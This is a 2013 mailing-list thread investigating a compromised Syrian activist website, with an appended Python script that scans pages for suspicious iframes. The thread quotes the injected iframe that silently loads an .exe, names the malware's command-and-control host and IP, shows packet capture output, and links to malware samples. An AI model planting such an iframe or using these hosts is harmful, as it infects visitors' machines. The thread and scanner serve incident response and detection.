[liberationtech] Syrian-martyrs.com website probably compromised by virus
SiNA Rabbani
sina at redteam.io
Tue Jan 29 18:02:00 PST 2013
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Ok. I infected an old Windows XP with this malware and it keeps
sending SYN requests to this hostname: awrasx10.no-ip.biz which
currently resolves to: 37.236.124.197 and is down for me.
- --SiNA
Internet Protocol Version 4, Src: 10.10.10.17 (10.10.10.17), Dst: 37.236.124.197 (37.236.124.197)
Version: 4
Header length: 20 bytes
Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00: Not-ECT (Not ECN-Capable Transport))
0000 00.. = Differentiated Services Codepoint: Default (0x00)
.... ..00 = Explicit Congestion Notification: Not-ECT (Not ECN-Capable Transport) (0x00)
Total Length: 48
Identification: 0x06b0 (1712)
Flags: 0x02 (Don't Fragment)
0... .... = Reserved bit: Not set
.1.. .... = Don't fragment: Set
..0. .... = More fragments: Not set
Fragment offset: 0
Time to live: 128
Protocol: TCP (6)
Header checksum: 0x3d4c [correct]
[Good: True]
[Bad: False]
Source: 10.10.10.17 (10.10.10.17)
Destination: 37.236.124.197 (37.236.124.197)
Transmission Control Protocol, Src Port: llsurfup-https (1184), Dst Port: distinct (9999), Seq: 0, Len: 0
Source port: llsurfup-https (1184)
Destination port: distinct (9999)
[Stream index: 2258]
Sequence number: 0 (relative sequence number)
Header length: 28 bytes
Flags: 0x002 (SYN)
Window size value: 65535
[Calculated window size: 65535]
Checksum: 0xdc28 [validation disabled]
Options: (8 bytes)
Andrew Lewis:
> Just a heads up the site's been taken down, malware is here:
> https://resources.telecomix.ceops.eu/material/malwares/
>
> Also looking at getting access to the server in question for
> forensics.
>
> -Andrew
>
> On Jan 30, 2013, at 11:34 AM, SiNA Rabbani <sina at redteam.io>
> wrote:
>
> This is the malware:
>
> https://www.virustotal.com/file/cfdd3a78a895b3f49a39402eb28b0d2134cc3086849a41a6fdfe7d829a0d4dcd/analysis/
>
> --SiNA
>
> SiNA Rabbani:
>
> holy shit:
>
> <iframe name="I1" width="10" height="10"
> src="http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe"
> border="0"
> frameborder="0">
>
> :/ if you are running windows don't even go there!!!
>
> Andrew Lewis:
>
> I can get to this in 6 hours or so, maybe someone is willing to
> jump on this before then?
>
> -Andrew
>
> On Jan 30, 2013, at 11:06 AM, KheOps <kheops at ceops.eu> wrote:
>
> Dear Libtech,
>
> We just saw that the website: http://www.syrian-martyrs.com
> is probably compromised. Every page of the website contains an
> iFrame which links to a .exe file which is detected as a virus
> by antivirus software:
> http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe
>
> The fact that the HTML code is present at the bottom of each page
> makes me think that the "index.php" page has been changed in a way
> that makes that iFrame appear on every page of the website,
> after the dynamic content.
>
> It also probably means that the attackers have some kind of
> access to the server. My guess would be going to a PHP shell,
> but I'm no expert in this.
>
> Any help, clue, investigation, would be very welcome :)
>
> Thank you, KheOps
> -- Unsubscribe, change to digest, or change password at:
>
> https://mailman.stanford.edu/mailman/listinfo/liberationtech
- --
“Be the change you want to see in the world.” Gandhi
OTR: inf0 at jabber.ccc.de
a5dae15f45a37e9768f6deae7b54807fc4942ec9
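A defender-side check for the injection pattern KheOps describes above (a tiny iframe appended after the dynamic content, loading an .exe from an unrelated host), added here as an example and not code from the thread; the sample page and the video.example.org control frame are constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page: a 10x10 iframe loading an .exe from an unrelated host, plus a normal embed as control.
SAMPLE_PAGE = """<html><body>
<h1>News</h1><p>article text</p>
<iframe name="I1" width="10" height="10"
 src="http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe"
 border="0" frameborder="0"></iframe>
<iframe src="https://video.example.org/embed/1" width="560" height="315"></iframe>
</body></html>"""

EXECUTABLE_EXTS = (".exe", ".scr", ".msi", ".com", ".pif", ".bat")
TINY_PX = 20  # a frame this small is effectively invisible to the visitor

def _px(value):
    """Return a width/height attribute as an int of pixels, or None (e.g. '100%')."""
    m = re.fullmatch(r"\s*(\d+)(px)?\s*", str(value or ""))
    return int(m.group(1)) if m else None

class IframeAuditor(HTMLParser):
    """Records every <iframe> whose src or geometry matches an injection pattern."""
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []  # list of (src, [reasons])

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)
        src = a.get("src") or ""
        parsed = urlparse(src)
        reasons = []
        if parsed.path.lower().endswith(EXECUTABLE_EXTS):
            reasons.append("src is an executable download")
        w, h = _px(a.get("width")), _px(a.get("height"))
        tiny = w is not None and h is not None and w <= TINY_PX and h <= TINY_PX
        offsite = bool(parsed.hostname) and parsed.hostname.lower() != self.site_host
        if tiny and offsite:
            reasons.append(f"hidden {w}x{h} frame loading from {parsed.hostname}")
        if reasons:
            self.findings.append((src, reasons))

def audit_page(html, site_host):
    """Parse one page and return the suspicious iframes found in it."""
    auditor = IframeAuditor(site_host)
    auditor.feed(html)
    return auditor.findings
```

Run it over every page a crawler fetches from the site; a hit on a page whose source you did not change is the signal that the template or index.php was modified.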